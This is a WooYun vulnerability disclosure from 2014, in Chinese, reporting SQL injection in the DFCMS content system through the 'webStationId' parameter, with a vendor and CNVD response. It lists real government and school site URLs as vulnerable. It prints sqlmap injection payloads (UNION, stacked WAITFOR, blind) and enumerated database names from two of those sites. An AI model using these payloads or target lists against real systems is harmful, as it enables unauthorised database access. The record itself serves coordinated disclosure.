当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-087151

漏洞标题: DFCMS系统#通用SQL注射

相关厂商:江苏鼎峰信息技术有限公司

漏洞作者: 岩少

提交时间:2014-12-16 12:45

修复时间:2015-03-16 12:46

公开时间:2015-03-16 12:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-12-16: 细节已通知厂商并且等待厂商处理中
2014-12-19: 厂商已经确认,细节仅向厂商公开
2014-12-22: 细节向第三方安全合作伙伴开放
2015-02-12: 细节向核心白帽子及相关领域专家公开
2015-02-22: 细节向普通白帽子公开
2015-03-04: 细节向实习白帽子公开
2015-03-16: 细节向公众公开

简要描述:

RT

详细说明:

江苏鼎峰信息技术有限公司:http://www.dfcms.net/
存在注入参数:webStationId
案例如下:
http://www.jkedu.net.cn:8080/webStationStats/webStationStats.do?method=stats&saasAppId=bdb5639f-c8ad-4b98-92fb-80cba5c7f567&webStationId=www_jkedu_net_cn
http://www.dantu.gov.cn/webStationStats/webStationStats.do?method=stats&saasAppId=49aac47a-f659-42aa-ac57-
b9510e0aef5c&webStationId=hrss_dantu_gov_cn
http://www.jre.net.cn/webStationStats/webStationStats.do?method=stats&saasAppId=f463e6d9-c0c7-47a2-841d-
4e923d18b564&webStationId=www_jre_net_cn
http://www.dfcms.net:8080/webStationStats/webStationStats.do?method=stats&saasAppId=7defe4ae-dfb0-4901-87b7-
a30ee511f456&webStationId=dj_jkxiangjhcxx_zje_net_cn
http://rztsg.com/webStationStats/webStationStats.do?method=stats&saasAppId=e8aec4c4-064d-4b4c-af9d-a6018a2cf035&webStationId=www_rztsg_com
http://www.zslxx.cn/webStationStats/webStationStats.do?method=stats&saasAppId=a42bb76e-afff-4bba-ad3c-
cb23608a6d0f&webStationId=www_zslxx_cn
http://218.3.133.26/webStationStats/webStationStats.do?method=stats&saasAppId=8fd048c0-473c-410b-9641-
33f08beb8a85&webStationId=fmszyey_dtjy_org
http://222.186.119.241/webStationStats/webStationStats.do?method=stats&saasAppId=1044b6f7-8a6a-4f9b-9d88-74c59c9c691f&webStationId=www_dantu_gov_cn
http://www.jszjsx.com/webStationStats/webStationStats.do?method=stats&saasAppId=d30101e0-22a1-4c3e-9f57-
36a5331df10a&webStationId=c201301_jszjsx_com
1.测试注入点:http://www.dantu.gov.cn/webStationStats/webStationStats.do?method=stats&saasAppId=49aac47a-f659-42aa-ac57-b9510e0aef5c&webStationId=hrss_dantu_gov_cn

3.png


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: webStationId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: method=stats&saasAppId=49aac47a-f659-42aa-ac57-b9510e0aef5c&webStat
ionId=hrss_dantu_gov_cn' AND 6189=6189 AND 'WeWR'='WeWR
    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: method=stats&saasAppId=49aac47a-f659-42aa-ac57-b9510e0aef5c&webStat
ionId=-8397' UNION ALL SELECT 80,80,80,CHAR(113)+CHAR(103)+CHAR(111)+CHAR(115)+C
HAR(113)+CHAR(89)+CHAR(85)+CHAR(76)+CHAR(118)+CHAR(104)+CHAR(119)+CHAR(112)+CHAR
(84)+CHAR(85)+CHAR(103)+CHAR(113)+CHAR(103)+CHAR(103)+CHAR(102)+CHAR(113),80,80,
80,80,80,80,80,80,80,80,80,80--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: method=stats&saasAppId=49aac47a-f659-42aa-ac57-b9510e0aef5c&webStat
ionId=hrss_dantu_gov_cn'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: method=stats&saasAppId=49aac47a-f659-42aa-ac57-b9510e0aef5c&webStat
ionId=hrss_dantu_gov_cn' WAITFOR DELAY '0:0:5'--
---
[16:59:29] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: Servlet 2.4, JSP, Tomcat 4.2.2.
back-end DBMS: Microsoft SQL Server 2005
[16:59:29] [INFO] fetching database names
[16:59:29] [INFO] the SQL query used returns 25 entries
[16:59:29] [INFO] retrieved: lumigent
[16:59:30] [INFO] retrieved: master
[16:59:30] [INFO] retrieved: model
[16:59:30] [INFO] retrieved: msdb
[16:59:30] [INFO] retrieved: saas_by
[16:59:30] [INFO] retrieved: saas_by
[16:59:30] [INFO] retrieved: saas_dantu
[16:59:30] [INFO] retrieved: saas_dtcs
[16:59:31] [INFO] retrieved: saas_dtfzb
[16:59:31] [INFO] retrieved: saas_gq
[16:59:31] [INFO] retrieved: saas_gy
[16:59:31] [INFO] retrieved: saas_gz
[16:59:31] [INFO] retrieved: saas_hrss
[16:59:31] [INFO] retrieved: saas_jsdttv
[16:59:31] [INFO] retrieved: saas_jxz
[16:59:32] [INFO] retrieved: saas_qzlx
[16:59:32] [INFO] retrieved: saas_rb
[16:59:32] [INFO] retrieved: saas_sd
[16:59:32] [INFO] retrieved: saas_sy
[16:59:32] [INFO] retrieved: saas_xc
[16:59:32] [INFO] retrieved: saas_xf
[16:59:32] [INFO] retrieved: saas_zgmfsfgy
[16:59:33] [INFO] retrieved: saas_zjjtxx
[16:59:33] [INFO] retrieved: saas_zjsgxydtz
[16:59:33] [INFO] retrieved: tempdb
available databases [24]:
[*] lumigent
[*] master
[*] model
[*] msdb
[*] saas_by
[*] saas_dantu
[*] saas_dtcs
[*] saas_dtfzb
[*] saas_gq
[*] saas_gy
[*] saas_gz
[*] saas_hrss
[*] saas_jsdttv
[*] saas_jxz
[*] saas_qzlx
[*] saas_rb
[*] saas_sd
[*] saas_sy
[*] saas_xc
[*] saas_xf
[*] saas_zgmfsfgy
[*] saas_zjjtxx
[*] saas_zjsgxydtz
[*] tempdb


2.测试注入点:http://www.jre.net.cn/webStationStats/webStationStats.do?method=stats&saasAppId=f463e6d9-c0c7-47a2-841d-4e923d18b564&webStationId=www_jre_net_cn

4.png


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: webStationId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: method=stats&saasAppId=f463e6d9-c0c7-47a2-841d-4e923d18b564&webStat
ionId=www_jre_net_cn' AND 3929=3929 AND 'BtJU'='BtJU
    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: method=stats&saasAppId=f463e6d9-c0c7-47a2-841d-4e923d18b564&webStat
ionId=-5741' UNION ALL SELECT 70,70,70,CHAR(113)+CHAR(98)+CHAR(118)+CHAR(106)+CH
AR(113)+CHAR(66)+CHAR(75)+CHAR(102)+CHAR(109)+CHAR(99)+CHAR(105)+CHAR(75)+CHAR(6
6)+CHAR(89)+CHAR(99)+CHAR(113)+CHAR(98)+CHAR(115)+CHAR(103)+CHAR(113),70,70,70,7
0,70,70,70,70,70,70,70,70--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: method=stats&saasAppId=f463e6d9-c0c7-47a2-841d-4e923d18b564&webStat
ionId=www_jre_net_cn'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: method=stats&saasAppId=f463e6d9-c0c7-47a2-841d-4e923d18b564&webStat
ionId=www_jre_net_cn' WAITFOR DELAY '0:0:5'--
---
[17:01:04] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: Servlet 2.4, JSP, Tomcat 4.2.2.
back-end DBMS: Microsoft SQL Server 2005
[17:01:04] [INFO] fetching database names
[17:01:05] [INFO] the SQL query used returns 41 entries
[17:01:05] [INFO] retrieved: KPM6
[17:01:05] [INFO] retrieved: master
[17:01:05] [INFO] retrieved: model
[17:01:05] [INFO] retrieved: msdb
[17:01:05] [INFO] retrieved: mssql_test
[17:01:05] [INFO] retrieved: OAWeb
[17:01:06] [INFO] retrieved: saas_baotalu
[17:01:06] [INFO] retrieved: saas_baotalu
[17:01:06] [INFO] retrieved: saas_bcxxx
[17:01:06] [INFO] retrieved: saas_chinanet
[17:01:06] [INFO] retrieved: saas_cswq
[17:01:06] [INFO] retrieved: saas_dfcms
[17:01:07] [INFO] retrieved: saas_dfoa
[17:01:07] [INFO] retrieved: saas_dtjcy
[17:01:07] [INFO] retrieved: saas_dyjtxx
[17:01:07] [INFO] retrieved: saas_jbzxxx
[17:01:07] [INFO] retrieved: saas_jkdfsxx
[17:01:07] [INFO] retrieved: SAAS_jkedu
[17:01:07] [INFO] retrieved: SAAS_jkedu
[17:01:08] [INFO] retrieved: saas_jkjys
[17:01:08] [INFO] retrieved: saas_jrjy
[17:01:08] [INFO] retrieved: saas_jrxxzxx
[17:01:08] [INFO] retrieved: saas_jsdf
[17:01:08] [INFO] retrieved: saas_jszjsxoa
[17:01:08] [INFO] retrieved: saas_jszjsxoa
[17:01:08] [INFO] retrieved: saas_lll
[17:01:09] [INFO] retrieved: saas_mfgy
[17:01:09] [INFO] retrieved: saas_nfh
[17:01:09] [INFO] retrieved: saas_njuzj
[17:01:09] [INFO] retrieved: saas_rzjys
[17:01:09] [INFO] retrieved: saas_shop
[17:01:09] [INFO] retrieved: saas_thwxx
[17:01:10] [INFO] retrieved: saas_twzx
[17:01:10] [INFO] retrieved: saas_xjhcoa
[17:01:10] [INFO] retrieved: saas_xjhcoa
[17:01:10] [INFO] retrieved: saas_zjhqxx
[17:01:10] [INFO] retrieved: saas_zjjcywx
[17:01:10] [INFO] retrieved: saas_zjjtxx
[17:01:10] [INFO] retrieved: saas_zjwsjdoa
[17:01:11] [INFO] retrieved: saas_zslxx
[17:01:11] [INFO] retrieved: tempdb
available databases [37]:
[*] KPM6
[*] master
[*] model
[*] msdb
[*] mssql_test
[*] OAWeb
[*] saas_baotalu
[*] saas_bcxxx
[*] saas_chinanet
[*] saas_cswq
[*] saas_dfcms
[*] saas_dfoa
[*] saas_dtjcy
[*] saas_dyjtxx
[*] saas_jbzxxx
[*] saas_jkdfsxx
[*] SAAS_jkedu
[*] saas_jkjys
[*] saas_jrjy
[*] saas_jrxxzxx
[*] saas_jsdf
[*] saas_jszjsxoa
[*] saas_lll
[*] saas_mfgy
[*] saas_nfh
[*] saas_njuzj
[*] saas_rzjys
[*] saas_shop
[*] saas_thwxx
[*] saas_twzx
[*] saas_xjhcoa
[*] saas_zjhqxx
[*] saas_zjjcywx
[*] saas_zjjtxx
[*] saas_zjwsjdoa
[*] saas_zslxx
[*] tempdb
[17:01:11] [INFO] fetched data logged to text files under 'C:\Documents and Sett
ings\Administrator\.sqlmap\output\www.jre.net.cn'


均可复现

漏洞证明:

3.png


4.png

修复方案:

过滤参数

版权声明:转载请注明来源 岩少@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-12-19 22:39

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。

最新状态:

暂无